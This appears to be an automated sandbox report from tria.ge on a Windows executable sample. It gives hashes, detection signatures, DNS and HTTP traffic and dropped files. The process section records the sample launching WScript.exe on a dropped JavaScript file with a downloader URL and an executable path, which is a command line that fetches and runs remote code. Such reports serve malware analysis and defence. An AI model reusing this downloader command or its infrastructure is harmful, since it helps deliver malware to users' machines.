Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

7541be9044...18.exe

windows7-x64

8

7541be9044...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2024, 10:58 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    7541be9044f3a1d7ab258bb36f857a2e

  • SHA1

    25b38a97fd748ef26874fa390f98597013ef102d

  • SHA256

    b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19

  • SHA512

    40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2200
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2632
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:2160
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe
      2⤵
      • Blocklisted process makes network request
      PID:1764

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.204.160:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:08 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.6.37
  • flag-us
    DNS
    crl.verisign.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.verisign.com
    IN A
    Response
    crl.verisign.com
    IN CNAME
    crl-symcprod.digicert.com
    crl-symcprod.digicert.com
    IN CNAME
    crl.edge.digicert.com
    crl.edge.digicert.com
    IN CNAME
    fp2e7a.wpc.2be4.phicdn.net
    fp2e7a.wpc.2be4.phicdn.net
    IN CNAME
    fp2e7a.wpc.phicdn.net
    fp2e7a.wpc.phicdn.net
    IN A
    192.229.221.95
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:09 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Wed, 21-May-2025 10:59:09 GMT; path=/
    set-cookie: site_version=HDv3; expires=Wed, 21-May-2025 10:59:09 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8365lZPTEkBb4Ush2TWY5PpOtzIJ01hNz%2BZa5IwTi2%2FJ9rvzP9fu54eP3J%2BKYbsKO86hm%2BOr0ZWzooKLz6l%2F9Wc7u94D8%2ByPIh7yIP5%2Bq72Sao2iFYJ4d4qIeri2xmSz04LMp0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d410cabcf7795-LHR
    Content-Encoding: gzip
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-6.hugedomains.com
    traff-6.hugedomains.com
    IN CNAME
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    IN A
    18.119.154.66
    hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
    IN A
    3.140.13.188
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:14 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:15 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PtF6yq%2BTMIVLG6f7vUEVAEKvA%2FlLRxgSnvJDzmAUk9hy40cbb1We2ncTF9M9kWQZnScQL12UudaBPRcX%2FoXw90VWdlPcPU%2BuKm5UrbXvn2yJvQw1NTQIrRyyj2wzdWO%2FUSG6go%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41379e2493ef-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:21 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:22 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qryssScNrbpcmU5%2BICawunBKQhmoBKMmKd0GCZzc5224LwxM0rQ8oxlZ5DJoyXHd%2FaBJccjRDv%2Fr%2F9LghGswZqZz1Lu8axDxvbfKlsBGvmrODLbszbP8v4govU1uvAuBQSRoFTg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d415e7a6a4142-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:27 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:28 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMwMpq8G3qhgemrGltSL%2F4d0I9vT1vUt%2FB99X9NstbSvgFhvxsnkLKofqFjTrxDdx3ON461w8HuTpMtTUVeYOl%2FxIMbisLA4GMHj8HhrimxAWcHpnAK6MDgdz%2FDWAEat%2F4Uaz%2Bw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41854a86dc73-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    18.119.154.66:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Sun, 26 May 2024 10:59:33 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.7.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 May 2024 10:59:34 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKInO%2FFpXRRhVm6CY35zWvm6DAxIGcGW%2FYjx2PNuZY6O%2BcTlMB0O8%2FY3lgtDetlwIuOJt6iCg2wYOmY5r3PwO%2FL8iYmSmGUBcc208FYQL%2BX9eil9CtbOwNbG%2BV5RSlAUuEq3nzE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 889d41abb94f79c4-LHR
    Content-Encoding: gzip
  • 3.130.204.160:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
     434 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.6kB
     16
    24

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
     243 B
     5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.2kB
     14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
     434 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.1kB
     14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
     434 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
     16.5kB
     16
    24

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 18.119.154.66:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    712 B
     434 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.7.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
     16.1kB
     14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.204.160
    3.130.253.23

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    127 B
     315 B
     2
    2

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.7.37
    172.67.70.191
    104.26.6.37

    DNS Request

    crl.verisign.com

    DNS Response

    192.229.221.95

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     192 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    18.119.154.66
    3.140.13.188

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    beba3522cd7eb77a09fe36abcb252a4f

    SHA1

    220cb347af597d4f8aacacff27eb0ce64207e99b

    SHA256

    63c5ec564440d74f3c2c2a161a66a22dbf30b03659f3309419a359ee1f8c0d4e

    SHA512

    35eb19b0e1061370a951b1ca3f66288c6ed1732ce7c94fc663eb3959383e0f5d8fc28b3ab1cb9f5f3cb75a314c3d1a0a62694f51490760ea88e8772916f49774

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    4b1fb413768013dd631ede3aab181222

    SHA1

    facd0b552964de15d0e2a0540be06a16670b67d0

    SHA256

    7a16a37868af6947c2f52dcc9c99150f24e8628428a23b7e25e202d67e71e705

    SHA512

    31c60bda3cf5a789a24a9d14464ee9a6ece38906124abe90e609be9b6e8b1143405f4eaae6f6bf478a0fb0ca25cfebcd0a373434161e4b94b153cc088eb9610e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    a1ff7bd0c5e9787f81690bc30a6eec13

    SHA1

    228b30acadb5016ae4b0cf717ec840eecf6b9bd9

    SHA256

    1fb0a1937912e1e264876319f161398a4350dba23bbbc79a09f4b682ced8514b

    SHA512

    199833901108bbcbc9f8b297549570a71460ecbba6e664be13d23345309f1f44bd6f087584169c869d684e97a0a3430da8c791fc6c6c058d9df59a1eb6d06ab8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    392B

    MD5

    c1b8ac3b17618be239b4f86debc28f28

    SHA1

    eae0e49b67aa1f743b9af1eea5dcb13332fa233d

    SHA256

    04e1d65892a09199e2677947ab609e3d408d58bbb33792c7966347d9dc490082

    SHA512

    f361f5ba92b634ad0e853ac4c09013c1d302e71a42d2fea4109ad2bdcfcb5472d35f0895230ac2c66738453d57a8d13505ffa1be2774dde3995462add6eae2bf

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm
    Filesize

    40KB

    MD5

    59c859a8197db9a36286c364ed8e8373

    SHA1

    53bb2708ef001021cb91ba7ed03908873e70af15

    SHA256

    180a2924f395fb3b793930aaf261932f29a8fa5d32c956a7bada2a5c4f9745f5

    SHA512

    15e398e5dbd88e2b1e82603ab116ab60e6ab931a1599d1e403b93f70be83fc66c2b56c09e584aa580cc5cfc8029b1a77da27e6c0138e264f36efd6a7c38ed1f9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm
    Filesize

    40KB

    MD5

    35ac46928fff89ce0e0837e8aed103c1

    SHA1

    81212da855e5b1e47f40a0c0a3ebe7bd786d215a

    SHA256

    8e88d51a7d0611bb48bee726000a8127bcb14ea5c0d3322cf0b908dae44080fe

    SHA512

    5afd5b1a123a14f93d82d4996384db898de8e391aa90388e2cadae8f64dbadb440eeeef9393e43e91335d0e0ed65690005992589e292e95f49a0f14ff47d02f8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
    Filesize

    40KB

    MD5

    12757d5e2769c789029997f38aa09933

    SHA1

    76381ca1c92cadc1ed5eb9b6ea9ec2c12af9e652

    SHA256

    db74725636e948b4a2f0a926472d01923ea1fe55e9d43f72e7fd6961f9c46c40

    SHA512

    9c43674817f349ef3dff15b8158d010d7291e2c0397a92ae6e7436c2dd33109c2c5efc041c666be31125d2705321f5582f39f38742841bd936b14693400ddd04

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
    Filesize

    40KB

    MD5

    9d04e87e950fda23ec57c6cdfb985765

    SHA1

    b5b6a91a006d3d3688224db22a1706d487e1b3cb

    SHA256

    fc83faab1877ca662569a166aa9e8d4eeccfc558d27d58ddf583eea409010c91

    SHA512

    cd1a34b73d7b0fc34a7b22d111e44a59a33b1166ada3755299ccacb854d34e7c3a4565119ba418ef51c2155421d3787dcf30ce5a9ee68c3036f069d13d630d90

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
    Filesize

    40KB

    MD5

    58f500f8828bb404119df82c494898aa

    SHA1

    47c4d3e529f4c1f125750ebaf3062bb032610538

    SHA256

    b13a79b344e0cf7ac434172cb20858170d2f68fb7b37a1449ba8e6d4d46c7e6c

    SHA512

    c25ab52f0d404da0e376297043f67d0a662d44ebf4436fcf89b6a086840e02dc2b0cda210b91a02e20a1993782ba36907865928338e9142afb3214d3bdbda806

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab4808.tmp
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar604A.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\fuf1870.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BNG5784G.txt
    Filesize

    177B

    MD5

    60f07c205254b5ddb4469ee675650502

    SHA1

    faeca9302a72d23b6b8043e24a5d8a16ea2b116f

    SHA256

    3e4b8b9840ff69f44e1a06deadd2b105809a763b5637b801fa6c2aa656ab260e

    SHA512

